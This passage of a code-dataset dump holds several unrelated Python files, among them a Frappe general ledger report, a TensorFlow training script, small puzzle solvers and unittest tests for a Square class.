dtype=object)\n\t\t\t\ttokens = theads[0].find_elements_by_xpath('./tr/th')\n\t\t\t\tfor j in range(len(tokens)):\n\t\t\t\t\ttable[0, j] = tokens[j].text\n\t\t\t\tfor i in range(len(rows)):\n\t\t\t\t\ttokens = rows[i].find_elements_by_xpath('./td')\n\t\t\t\t\tfor j in range(len(tokens)):\n\t\t\t\t\t\ttable[i + 1, j] = tokens[j].text\n\t\t\telse:\n\t\t\t\ttable = np.empty([len(rows), len(cols)], dtype=object)\n\t\t\t\tfor i in range(len(rows)):\n\t\t\t\t\ttokens = rows[i].find_elements_by_xpath('./td')\n\t\t\t\t\tfor j in range(len(tokens)):\n\t\t\t\t\t\ttable[i, j] = tokens[j].text\n\texcept Exception as e:\n\t\tprint('Error in scratching table elements: ', e)\n\t\ttable = None\n\treturn table\n\n\ndef table_to_dict(table_array, period_type):\n\ttd = {}\n\trows = table_array.shape[0]\n\tcols = table_array.shape[1]\n\tfor i in range(1, cols):\n\t\td = {}\n\t\tfor j in range(1, rows):\n\t\t\tif table_array[j, i] is not None:\n\t\t\t\tif table_array[j, i] == '-':\n\t\t\t\t\td[table_array[j, 0]] = 0.0\n\t\t\t\telse:\n\t\t\t\t\td[table_array[j, 0]] = float(table_array[j, i].replace(',', ''))\n\t\ttd[table_array[0, i]] = copy.deepcopy(d)\n\treturn td\n\n\n\n","sub_path":"modules/selenium_wrapper_methods.py","file_name":"selenium_wrapper_methods.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"119735820","text":"# Copyright (c) 2013, Komal and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\n\nfrom typing import Dict, List\n\nimport frappe\nfrom frappe import _\n\nfrom accounting.accounting.report.profit_and_loss.profit_and_loss import \\\n\tget_date_filter\n\n\ndef get_voucher_filter(filters: Dict = None) -> Dict:\n\tvoucher_no = filters.get('voucher_no')\n\tvoucher_type = filters.get('voucher_type')\n\tret = {}\n\tif voucher_type:\n\t\tret.update({\"voucher_type\": voucher_type})\n\tif voucher_no:\n\t\tret.update({\"voucher_no\": voucher_no})\n\treturn ret\n\n\ndef get_general_ledger_data(filters: Dict = None) -> List[Dict]:\n\tdate_filter = get_date_filter(filters)\n\tvoucher_filter = get_voucher_filter(filters)\n\tgl_entries = frappe.get_list(\n\t\t\"GL Entry\",\n\t\tfilters={\n\t\t\t**date_filter,\n\t\t\t**voucher_filter\n\t\t},\n\t\tfields=['account', 'debit', 'credit', 'voucher_no', 'voucher_type'],\n\t)\n\n\tdata = gl_entries\n\treturn data\n\n\ndef execute(filters=None):\n\tdata = get_general_ledger_data(filters)\n\tcolumns = [{\n\t\t\"fieldname\": \"account\",\n\t\t\"label\": _(\"Account\"),\n\t\t\"width\": 100\n\t}, {\n\t\t\"fieldname\": \"debit\",\n\t\t\"label\": _(\"Debit\"),\n\t\t\"width\": 100\n\t}, {\n\t\t\"fieldname\": \"credit\",\n\t\t\"label\": _(\"Credit\"),\n\t\t\"width\": 100\n\t}, {\n\t\t\"fieldname\": \"voucher_no\",\n\t\t\"label\": _(\"Debit\"),\n\t\t\"width\": 100\n\t}, {\n\t\t\"fieldname\": \"voucher_type\",\n\t\t\"label\": _(\"Voucher Type\"),\n\t\t\"width\": 200\n\t}]\n\treturn columns, data\n","sub_path":"accounting/accounting/report/general_ledger/general_ledger.py","file_name":"general_ledger.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"502349014","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/mtrax/colormapk.py\n# Compiled at: 2008-01-29 20:48:29\nimport matplotlib, numpy, matplotlib.colors\n\ndef colormap_image(imin, cmap=None, cbounds=None):\n assert imin.ndim <= 2\n if cmap is None:\n cmap = matplotlib.cm.jet\n assert isinstance(cmap, matplotlib.colors.Colormap)\n im = imin.astype(numpy.double)\n if cbounds is not None:\n assert len(cbounds) == 2\n assert cbounds[0] <= cbounds[1]\n im = im.clip(cbounds[0], cbounds[1])\n im -= im.min()\n im /= im.max()\n im *= cmap.N - 1.0\n im = im.round()\n im = im.astype(int)\n rgb = cmap(im)\n rgb = rgb[:, :, :-1]\n rgb *= 255\n rgb = rgb.astype(numpy.uint8)\n return rgb","sub_path":"pycfiles/Mtrax-2.2.07-py2.5-linux-i686/colormapk.py","file_name":"colormapk.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"130038126","text":"import unittest\nfrom urllib.request import urlopen\nfrom extracteur import*\n\n\nclass TestExtracteur(unittest.TestCase):\n bs = None\n \n def test_extracteur(self): #Fonction qui test le nombre de tableaux récupérés, si il est égal à 7 pour cet exemple, alors l'extracteur fonctionne correctement\n TestExtracteur.bs = BeautifulSoup(urlopen('https://en.wikipedia.org/wiki/New_York_City'), 'html.parser')\n TestTableau = TestExtracteur.bs.find_all('table',class_='wikitable')\n TestNbTab = len(TestTableau) \n \n self.assertTrue(TestTableau)\n self.assertEqual(TestNbTab,7)\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"test_extracteur.py","file_name":"test_extracteur.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"211196554","text":"\"\"\"\n@author: Jose Antonio Cervan Garcia\n\nNumber letter counts\n\nProblem 17\n\nIf the numbers 1 to 5 are written out in words: one, two, three, four, five,\nthen there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.\n\nIf all the numbers from 1 to 1000 (one thousand) inclusive were written out in\nwords, how many letters would be used?\n\nNOTE: Do not count spaces or hyphens. For example, 342 (three hundred and forty-two)\ncontains 23 letters and 115 (one hundred and fifteen) contains 20 letters. The use\nof \"and\" when writing out numbers is in compliance with British usage.\n\"\"\"\n\ndef numLetterCounter(n):\n data = {1:\"One\", 2:\"Two\", 3:\"Three\", 4:\"Four\", 5:\"Five\", 6:\"Six\", 7:\"Seven\", 8:\"Eight\", 9:\"Nine\", 10:\"Ten\",\n 11:\"Eleven\", 12:\"Twelve\", 13:\"Thirteen\",14:\"Fourteen\", 15:\"Fifteen\", 16:\"Sixteen\", 17:\"Seventeen\", 18:\"Eighteen\", 19:\"Nineteen\",\n 20:\"Twenty\", 30:\"Thirty\", 40:\"Forty\", 50:\"Fifty\",60:\"Sixty\", 70:\"Seventy\", 80:\"Eighty\", 90:\"Ninety\",\n 100:\"Hundred\",\n 1000:\"Thousand\"}\n \n if n < 100:\n \n if n in data:\n print(data[n], n)\n return len(data.get(n))\n \n dozens = n // 10\n data[n] = data[dozens * 10] + data[n % 10]\n print(data[n], n)\n return len(data.get(n))\n \n if n <= 1000:\n \n thousands = n // 1000\n hundreds = n // 100\n #dozens = (n - hundreds * 100) // 10\n #units = (n - hundreds * 100) % 10\n \n if n % 1000 == 0:\n data[n] = data[thousands] + data[1000]\n elif n % 100 == 0:\n data[n] = data[hundreds] + data[100]\n elif n % 100 <= 20:\n data[n] = data[hundreds] + data[(hundreds * 100) // hundreds] + 'And' + data[n % 100]\n elif n % 10 == 0:\n data[n] = data[hundreds] + data[(hundreds * 100) // hundreds] + 'And' + data[n % 100]\n else:\n data[n] = data[hundreds] + data[(hundreds * 100) // hundreds] + 'And' + data[n % 100 - n % 10] + data[n % 10]\n\n print(data[n], n)\n return len(data.get(n))\n\n###############################################################################\ntop = 1000\n\nletters = 0\n\nfor i in range(1, top + 1):\n letters += numLetterCounter(i)\n \nprint(\"\\nletters = \", letters)\n","sub_path":"problems/#0017.py","file_name":"#0017.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"908241","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom Lib import *\n\n\ntry:\n # 获取输入输出文件名\n input_file = sys.argv[1]\n output_file = sys.argv[2]\n\n # 数据初始化\n characters = 0\n words = 0\n lines = 0\n count = {}\n\n # 打开输入文件\n with open(input_file, encoding='utf-8', newline='') as f:\n for line in f:\n line = line.lower()\n\n # 统计每行字符数\n characters += count_character(line)\n\n # 统计非空白行数\n if not line.isspace():\n lines += 1\n\n # 统计每行单词数\n words += count_word(line, count)\n\n # 打开输出文件\n with open(output_file, 'w', encoding='utf-8', newline='') as f:\n f.write(\"characters: {0}\\n\".format(characters))\n f.write(\"words: {0}\\n\".format(words))\n f.write(\"lines: {0}\\n\".format(lines))\n\n # 输出最多的10个单词及其词频\n result = count_most(count)\n for k, v in result.items():\n f.write(\"{0}: {1}\\n\".format(k, v))\n\nexcept IndexError:\n print(\"未指明输入/输出文件\")\nexcept FileNotFoundError:\n print(\"找不到输入文件{0}\".format(input_file))\nexcept:\n info = sys.exc_info()\n print(info[1])\n","sub_path":"W_C/福大2021W班C++仓库运行结果/111801429/src/WordCount.py","file_name":"WordCount.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"71188219","text":"\"\"\"\nExpliquei o que é decorator e padrões de projeto. Crie um decorator que mostre\no tempo de execução de uma função que soma 4 números aleatórios. (2,0)\n\"\"\"\nimport datetime\nfrom random import randint\nimport time\n\n\ndef operacoes(dados):\n\n def meu_metodo():\n print(\"Tempo inicial de processo: \", datetime.datetime.now())\n print(\"Iniciando programa de operacoes...\")\n time.sleep(2)\n dados()\n print(\"Finalizando processo.\")\n print(\"Tempo final de processo: \", datetime.datetime.now())\n\n return meu_metodo\n\n@operacoes\ndef cria_dados():\n cadeia_num = []\n for n in range(4):\n cadeia_num.append(randint(0,1000))\n print(cadeia_num)\n print(\"A soma dos 4 números é igual a: \", sum(cadeia_num))\n\ncria_dados()","sub_path":"N1_exercicio_04.py","file_name":"N1_exercicio_04.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"161331777","text":"#!/usr/bin/env python3\n\n\"\"\" exit 1 if file[s] contain trailing whitespace. Report the offending lines.\n\n\"\"\"\nimport logging\nimport string\nimport sys\n\nlogging.basicConfig(level=logging.DEBUG)\n\nif len(sys.argv) < 2:\n sys.stderr.write(__doc__)\n sys.exit(2)\n\nexitflag = 0\nfor filename in sys.argv[1:]:\n with open(filename) as f:\n for line_number, line, in enumerate(f):\n if len(line) < 2:\n continue\n if line[-2] in string.whitespace:\n exitflag = 1\n # list of lines is zero indexed, but the first line of a file\n # is conventionally line 1, hence the +1\n print('{} L:{} : trailing whitespace'.format(\n filename,\n line_number + 1\n ))\n\nsys.exit(exitflag)\n","sub_path":"tools/trailing_whitespace.py","file_name":"trailing_whitespace.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"129539940","text":"high = 100\nlow = 0\nnum = 50\n\n\ndef average(high, low):\n num = int((high + low) / 2)\n return num\n\n\nprint(\"Please think of a number between 0 and 100!\")\n\n\nwhile True:\n print(\"Is your secret number %s?\" % num)\n user = input(\"Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed correctly. \")\n if user == 'h':\n high = num\n num = average(high, low)\n if user == 'l':\n low = num\n num = average(high, low)\n if user == 'c':\n print(\"Game over. Your secret number was: %s\" % num)\n break\n\n\n\n# class Guess:\n#\n# def __init__(self):\n# self.high = 100\n# self.input = ''\n# self.low = 0\n# self.average()\n# self.hint()\n# self.bisect()\n#\n# def average(self):\n# self.ans = (self.high + self.low) / 2\n#\n# def bisect(self):\n# while True:\n# if self.input == 'c':\n# print(\"Game over. Your secret number was: %s\" % self.ans)\n# exit()\n# elif self.input == 'h':\n# self.high = self.ans\n# self.average()\n# self.hint()\n# elif self.input == 'l':\n# self.low = self.ans\n# self.average()\n# self.hint()\n# else:\n# print(\"Sorry, I did not understand your input.\")\n# self.hint()\n#\n# def hint(self):\n# print(\"Is your secret number %s?\" % round(self.ans))\n# self.input = input(\"Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed correctly.\\n\")\n#\n# print(\"Please think of a number between 0 and 100!\")\n# guess = Guess()\n","sub_path":"files/python/newGuessGame.py","file_name":"newGuessGame.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"61232810","text":"import numpy as np\nimport tensorflow as tf\nimport os\nimport time\nimport ops\nimport data_buscrowd_fuzzy as data_buscrowd\nimport matplotlib.pyplot as plt\n# from model import model\n# from networks.mymodel_with_offset import model as model\nfrom networks.resnet_with_offset import resnet_v2_152 as model\n# from networks.google_v3 import inception_v3 as model\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nos.environ['CUDA_VISIBLE_DEVICES'] = '2,3'\n\nMAX_STEP=10000\nBATCH_SIZE=32\nlogs_train_dir='output/'\n\ndef save_list(data_list,name='result.txt'):\n fp = open(name, 'w+')\n for i in range(len(data_list)):\n fp.write(str(data_list[i]))\n fp.write(\" \")\n fp.close()\n\ndef remove_output():\n path = 'output/'\n for i in os.listdir(path):\n path_file = os.path.join(path, i)\n if os.path.isfile(path_file):\n os.remove(path_file)\n\ndef check_weights(sess,scope_name,tensor_name):\n with tf.variable_scope(scope_name,reuse=True):\n tensor = tf.get_variable(tensor_name)\n val=sess.run(tensor)\n print(tensor_name,val.shape,val)\n return val\n\ndef train():\n remove_output()\n is_training = tf.placeholder(tf.bool, shape=())\n train_img,train_lable=data_buscrowd.get_train_data(batch_size=BATCH_SIZE)\n test_img,test_lable=data_buscrowd.get_test_data(batch_size=BATCH_SIZE)\n x=tf.cond(is_training, lambda: train_img, lambda: test_img)\n y=tf.cond(is_training, lambda: train_lable, lambda: test_lable)\n logits=model(x,num_classes=4)\n losses=ops.loss_with_offset_fuzzy(logits,y)\n acc=ops.evaluationwith_offset_fuzzy_label(logits,y)\n step_ = tf.Variable(tf.constant(0))\n learing_rate = tf.train.exponential_decay(\n learning_rate=0.001, global_step=step_, decay_steps=100, decay_rate=0.8, staircase=True)\n\n train_op=ops.optimize_adam(losses,learing_rate)\n saver = tf.train.Saver()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n max_acc=0\n try:\n total_loss=[]\n total_acc=[]\n total_test_acc=[]\n plt.ion() # 开启interactive mode 成功的关键函数\n for step in np.arange(MAX_STEP):\n if coord.should_stop():\n break\n _,val_loss,val_acc,val_logits,val_lable,val_lr = sess.run([train_op,losses,acc,logits,y,learing_rate], feed_dict={is_training: True,step_:step})\n if step % 10 == 0:\n val_loss_test, val_acc_test = sess.run([losses, acc], feed_dict={is_training: False})\n total_loss.append(val_loss)\n total_acc.append(val_acc)\n total_test_acc.append(val_acc_test)\n print('\\n',step,' lr:',val_lr,' loss:',val_loss)\n print(' ','acc:',val_acc)\n print('eg:',val_logits[0],val_lable[0])\n val_logits=np.argmax(val_logits,1)\n print(val_logits-val_lable[:,0])\n plt.subplot(211)\n plt.plot(total_loss,'-r')\n plt.subplot(212)\n plt.plot(total_acc,'-y')\n plt.plot(total_test_acc,'-g')\n plt.pause(0.1)\n # check_weights( sess,'conv1','weight')\n if step % 500 == 0 or (step + 1) == MAX_STEP:\n if(val_acc>max_acc):\n max_acc=val_acc\n checkpoint_path = os.path.join(logs_train_dir, 'model_'+str(max_acc)+'.ckpt')\n saver.save(sess, checkpoint_path, global_step=step)\n save_list(total_acc,'acc_fuzzy.txt')\n save_list(total_test_acc,'test_acc_fuzzy.txt')\n save_list(total_loss,'loss_fuzzy.txt')\n except tf.errors.OutOfRangeError:\n print('Done training epoch limit reached')\n finally:\n coord.request_stop()\n coord.join(threads)\n sess.close()\n\ndef test():\n log_dir='output/'\n is_training = tf.placeholder(tf.bool, shape=())\n train_img, train_lable = data_buscrowd.get_train_data(batch_size=BATCH_SIZE)\n test_img, test_lable = data_buscrowd.get_test_data(batch_size=BATCH_SIZE)\n x = tf.cond(is_training, lambda: train_img, lambda: test_img)\n y = tf.cond(is_training, lambda: train_lable, lambda: test_lable)\n logits = model(x, num_classes=4)\n losses = ops.loss_with_offset_fuzzy(logits, y)\n acc = ops.evaluationwith_offset_fuzzy_label(logits, y)\n saver = tf.train.Saver()\n with tf.Session() as sess:\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n ckpt = tf.train.get_checkpoint_state(log_dir)\n if ckpt and ckpt.model_checkpoint_path:\n global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]\n saver.restore(sess, ckpt.model_checkpoint_path)\n else:\n print('No checkpoint')\n acc_total=[]\n cls_matrix=np.zeros([4,4])\n try:\n for i in range(20):\n val_loss,val_acc,val_logits,val_y = sess.run([losses,acc,logits,y], feed_dict={is_training: False})\n print(np.hstack((val_logits,val_y)))\n max_index = np.argmax(val_logits,1)\n # for j in range(32):\n # cls_matrix[val_y[j],max_index[j]]+=1\n acc_total.append(val_acc)\n print(val_acc)\n except tf.errors.OutOfRangeError:\n print('Done test epoch limit reached')\n finally:\n coord.request_stop()\n coord.join(threads)\n sess.close()\n return np.average(acc_total),cls_matrix\n\nif __name__=='__main__':\n train()\n # print(test())","sub_path":"train_fuzzy.py","file_name":"train_fuzzy.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"211386489","text":"import cv2 as cv\r\nimport numpy as np\r\nimport sys\r\n\r\ndef main():\r\n fname = sys.argv[1]\r\n im = cv.imread(fname)\r\n\r\n shape = list(im.shape)\r\n shape[-1] += 1 # to include alpha channel\r\n\r\n a = np.zeros(shape)\r\n\r\n white = np.array([255, 255, 255])\r\n tp = np.array([255, 255, 255, 0])\r\n\r\n for i in range(im.shape[0]):\r\n for j in range(im.shape[1]):\r\n if all(im[i][j] == white): a[i][j] = tp\r\n else:\r\n a[i][j][:-1] = im[i][j]\r\n a[i][j][-1] = 255\r\n\r\n fname = fname.split('.')[0] + '_no_background.png'\r\n cv.imwrite(fname, a)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"no_background.py","file_name":"no_background.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"220202459","text":"print(\"Enter your string\")\nmy_str = input()\n\n# make function for print in differnet cases\ndef all_cases(def_str):\n camel_case(def_str)\n cabab_case(def_str)\n snake_case(def_str)\n\n# Function for cabab case\ndef cabab_case(def_str):\n case = \"-\"\n other_case(def_str,case)\n\n# Function for snake case\ndef snake_case(def_str):\n case = \"_\"\n other_case(def_str,case)\n\n# Function for camel case\ndef camel_case(def_str):\n case_str = \"\"\n temp_str = \"\"\n char = 0\n while char < len(def_str):\n if def_str[char] == \" \":\n temp_str = def_str[char+1].upper()\n case_str += temp_str\n char += 2\n else:\n case_str += def_str[char].lower()\n char += 1\n print(case_str)\n\n# Function for defaual case for cabab and snake\ndef other_case(def_str,case):\n case_str = \"\"\n temp_str = \"\"\n char = 0\n while char < len(def_str):\n if def_str[char] == \" \":\n case_str += case\n char += 1\n else:\n case_str += def_str[char].lower()\n char += 1\n print(case_str)\n\nall_cases(my_str)","sub_path":"submissions/sm_115_suyash/week_13/day_5/strings_play.py","file_name":"strings_play.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"632463520","text":"class Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n hashtable=dict()\n for i ,num in enumerate(nums):\n if target-num in hashtable:\n return [hashtable[target-num],i]\n hashtable[nums[i]]=i\n return []\na=Solution()\nb=[2,5,5,11]\nc=a.twoSum(b,10)\nprint(c)\n","sub_path":"Week2/两数之和哈希表实现.py","file_name":"两数之和哈希表实现.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"17191499","text":"#!/usr/bin/python3\n\"\"\"\nThis module contains the test cases for Square\n\"\"\"\nimport unittest\nimport pep8\nfrom models.base import Base\nfrom models.rectangle import Rectangle\nfrom models.square import Square\nfrom contextlib import contextmanager\nimport json\nimport sys\nimport os\nfrom io import StringIO\n\n\nclass TestSquareClass(unittest.TestCase):\n \"\"\"\n This class contains the test methods\n \"\"\"\n @classmethod\n def setUpClass(cls):\n \"\"\"\n sets up at beginning of class\n \"\"\"\n Base._Base__nb_objects = 0\n cls.test = Square(10)\n cls.test1 = Square(1, 2, 5)\n cls.test2 = Square(5, 9, 8, 9)\n cls.test3 = Square(3, 8, 3, 4)\n\n def setUp(self):\n \"\"\"\n resets variables\n \"\"\"\n r1 = r2 = output = temp = 0\n\n def test_doctest(self):\n \"\"\"\n test for docstring\n \"\"\"\n self.assertIsNotNone(Base.__doc__)\n\n def test_class(self):\n \"\"\"\n tests for class\n \"\"\"\n self.assertTrue(isinstance(self.test, Square))\n\n def test_class_inheritance(self):\n \"\"\"\n test for base inheritence\n \"\"\"\n self.assertTrue(issubclass(type(self.test), Base))\n\n def test_pep8_model(self):\n \"\"\"\n Tests for pep8\n \"\"\"\n style = pep8.StyleGuide(quiet=True)\n pepp = style.check_files(['models/square.py'])\n self.assertEqual(pepp.total_errors, 0, \"fix pep8\")\n\n def test_pep8_test(self):\n \"\"\"\n Tests for pep8\n \"\"\"\n style = pep8.StyleGuide(quiet=True)\n pepp = style.check_files(['tests/test_models/test_square.py'])\n self.assertEqual(pepp.total_errors, 0, \"fix pep8\")\n\n def test_class_init(self):\n \"\"\"\n tests for id\n \"\"\"\n self.assertEqual(self.test.id, 1)\n self.assertEqual(self.test1.id, 2)\n self.assertEqual(self.test2.id, 9)\n self.assertEqual(self.test3.id, 4)\n\n def test_class_variables(self):\n \"\"\"\n tests for normal operation\n \"\"\"\n self.assertEqual(self.test.size, 10)\n self.assertEqual(self.test1.size, 1)\n self.assertEqual(self.test2.size, 5)\n self.assertEqual(self.test3.size, 3)\n self.assertEqual(self.test1.x, 2)\n self.assertEqual(self.test2.x, 9)\n self.assertEqual(self.test3.x, 8)\n self.assertEqual(self.test1.y, 5)\n self.assertEqual(self.test2.y, 8)\n self.assertEqual(self.test3.y, 3)\n\n def test_input_errors(self):\n \"\"\"\n tests for improper use\n \"\"\"\n self.assertRaises(TypeError, Square, ())\n\n def test_integer_validator(self):\n \"\"\"\n tests for integer validator\n \"\"\"\n with self.assertRaises(TypeError, msg=\"width must be an integer\"):\n temp = Square(\"a\", \"b\")\n with self.assertRaisesRegex(TypeError, \"x must be an integer\"):\n temp = Square(1, \"b\")\n with self.assertRaisesRegex(TypeError, \"y must be an integer\"):\n temp = Square(1, 1, \"b\")\n with self.assertRaisesRegex(ValueError, \"width must be > 0\"):\n temp = Square(-1, -1)\n with self.assertRaisesRegex(ValueError, \"x must be >= 0\"):\n temp = Square(1, -1, -1, -1)\n with self.assertRaisesRegex(ValueError, \"y must be >= 0\"):\n temp = Square(1, 2, -1, -1)\n\n def test_area(self):\n \"\"\"\n tests for area\n \"\"\"\n self.assertEqual(self.test.area(), 100)\n self.assertEqual(self.test1.area(), 1)\n self.assertEqual(self.test2.area(), 25)\n self.assertEqual(self.test3.area(), 9)\n\n def test_display_0_1(self):\n \"\"\"\n tests for string output\n \"\"\"\n @contextmanager\n def test_display():\n new_out = old_out = \"\"\n new_out = StringIO()\n old_out = sys.stdout\n try:\n sys.stdout = new_out\n yield sys.stdout\n finally:\n sys.stdout = old_out\n with test_display() as out:\n temp = Square(3)\n temp.display()\n output = out.getvalue().strip()\n self.assertEqual(output, \"###\\n###\\n###\")\n\n with test_display() as out:\n temp = Square(3, 2, 2)\n temp.display()\n output = out.getvalue()\n self.assertEqual(output, \"\\n\\n ###\\n ###\\n ###\\n\")\n\n def test_str(self):\n \"\"\"\n tests for string rep of instances\n \"\"\"\n self.assertEqual(str(self.test), \"[Square] (1) 0/0 - 10\")\n self.assertEqual(str(self.test1), \"[Square] (2) 2/5 - 1\")\n self.assertEqual(str(self.test2), \"[Square] (9) 9/8 - 5\")\n self.assertEqual(str(self.test3), \"[Square] (4) 8/3 - 3\")\n\n def test_update_0(self):\n \"\"\"\n tests for update via args\n \"\"\"\n temp = Square(5)\n self.assertEqual(temp.size, 5)\n temp.update(3, 4)\n self.assertEqual(temp.id, 3)\n self.assertEqual(temp.size, 4)\n temp.update(9, 8, 7, 6)\n self.assertEqual(temp.id, 9)\n self.assertEqual(temp.size, 8)\n self.assertEqual(temp.x, 7)\n self.assertEqual(temp.y, 6)\n\n def test_update_1(self):\n \"\"\"\n test for kwargs\n \"\"\"\n temp = Square(9, 8, 7, 6)\n self.assertEqual(str(temp), \"[Square] (6) 8/7 - 9\")\n temp.update(id=1)\n self.assertEqual(temp.id, 1)\n temp.update(size=3)\n self.assertEqual(temp.size, 3)\n temp.update(x=4)\n self.assertEqual(temp.x, 4)\n temp.update(y=12)\n self.assertEqual(temp.y, 12)\n\n def test_getter_setter(self):\n \"\"\"\n test for setter / getter\n \"\"\"\n temp = Square(5)\n self.assertEqual(temp.size, 5)\n with self.assertRaisesRegex(TypeError, \"width must be an integer\"):\n temp.size = \"9\"\n\n def test_to_dictionary(self):\n \"\"\"\n test for dictionary output\n \"\"\"\n temp = Square(10, 2, 1, 9)\n r1 = temp.to_dictionary()\n self.assertEqual(r1, {'id': 9, 'x': 2, 'size': 10, 'y': 1})\n\n def test_to_json_string(self):\n \"\"\"\n tests for converting to json\n \"\"\"\n temp = Square(10, 2, 1, 9)\n s1 = temp.to_dictionary()\n s2 = temp.to_json_string(s1)\n self.assertEqual(s2, json.dumps(s1))\n\n def test_json_string_to_file(self):\n \"\"\"\n tests for saving to file\n \"\"\"\n temp1 = Square(5, 6, 2, 9)\n temp2 = Square(1, 2, 3, 4)\n Square.save_to_file([temp1, temp2])\n with open(\"Square.json\") as file:\n r1 = file.read()\n r2 = [temp1.to_dictionary(), temp2.to_dictionary()]\n self.assertEqual(json.dumps(r2), r1)\n\n def test_from_json(self):\n \"\"\"\n tests for converting from json string\n \"\"\"\n temp1 = Square(5, 6, 2, 9)\n temp2 = Square(1, 2, 3, 4)\n r1 = [temp1.to_dictionary(), temp2.to_dictionary()]\n self.assertTrue(isinstance(r1, list))\n r2 = Square.to_json_string(r1)\n self.assertTrue(isinstance(r2, str))\n r3 = Square.from_json_string(r2)\n self.assertTrue(isinstance(r3, list))\n\n def test_create(self):\n \"\"\"\n tests new instance is independant\n \"\"\"\n r1 = Square(4, 8, 9)\n dict1 = r1.to_dictionary()\n r2 = Square.create(**dict1)\n self.assertFalse(r1 is r2)\n self.assertFalse(r1 == r2)\n\n def test_load_from_file(self):\n \"\"\"\n tests data ca be loaded\n \"\"\"\n r1 = Square(1, 1, 1)\n r2 = Square(2, 2, 2)\n lists = [r1, r2]\n Square.save_to_file(lists)\n output = Square.load_from_file()\n self.assertTrue(isinstance(output, list))\n o1 = output[0]\n o2 = output[1]\n self.assertTrue(isinstance(o1, Square))\n self.assertTrue(isinstance(o2, Square))\n self.assertEqual(str(r1), str(o1))\n self.assertEqual(str(r2), str(o2))\n\n def test_return_empty(self):\n \"\"\"\n tests when passing none\n \"\"\"\n output = Square.to_json_string(None)\n self.assertEqual(output, \"[]\")\n output = Square.to_json_string([])\n self.assertEqual(output, \"[]\")\n\n def test_save_empty(self):\n \"\"\"\n tests when list is empty\n \"\"\"\n lists = []\n Square.save_to_file(lists)\n with open(\"Square.json\", \"r\") as f:\n self.assertEqual(\"[]\", f.read())\n\n def test_save_None(self):\n \"\"\"\n testwhen input is None\n \"\"\"\n Square.save_to_file(None)\n with open(\"Square.json\", \"r\") as f:\n self.assertEqual(\"[]\", f.read())\n\n def test_load_no_file(self):\n \"\"\"\n tests when there is no file\n \"\"\"\n try:\n Square.save_to_file(None)\n os.remove(\"Square.json\")\n except BaseException:\n pass\n self.assertEqual(Square.load_from_file(), [])\n\n def test_load_empty_file(self):\n \"\"\"\n testswhen file is empty\n \"\"\"\n try:\n Square.save_to_file(None)\n os.remove(\"Square.json\")\n except BaseException:\n pass\n open(\"Square.json\", 'a').close()\n self.assertEqual(Square.load_from_file(), [])\n\n def test_csv(self):\n \"\"\"\n tests for csv usage\n \"\"\"\n r1 = Square(10, 7, 2, 8)\n r2 = Square(2, 4)\n list_input = [r1, r2]\n\n Square.save_to_file_csv(list_input)\n\n list_output = Square.load_from_file_csv()\n\n o1 = list_output[0]\n o2 = list_output[1]\n self.assertTrue(isinstance(o1, Square))\n self.assertTrue(isinstance(o2, Square))\n self.assertEqual(str(r1), str(o1))\n self.assertEqual(str(r2), str(o2))\n\n def test_no_csv(self):\n \"\"\"\n test when there is no file\n \"\"\"\n try:\n Square.save_to_file_csv(None)\n os.remove(\"Square.json\")\n except BaseException:\n pass\n self.assertEqual(Square.load_from_file_csv(), [])\n\n def test_load_empty_csv(self):\n \"\"\"\n tests when file is empty\n \"\"\"\n try:\n Square.save_to_file_csv(None)\n os.remove(\"Square.json\")\n except BaseException:\n pass\n open(\"Square.json\", 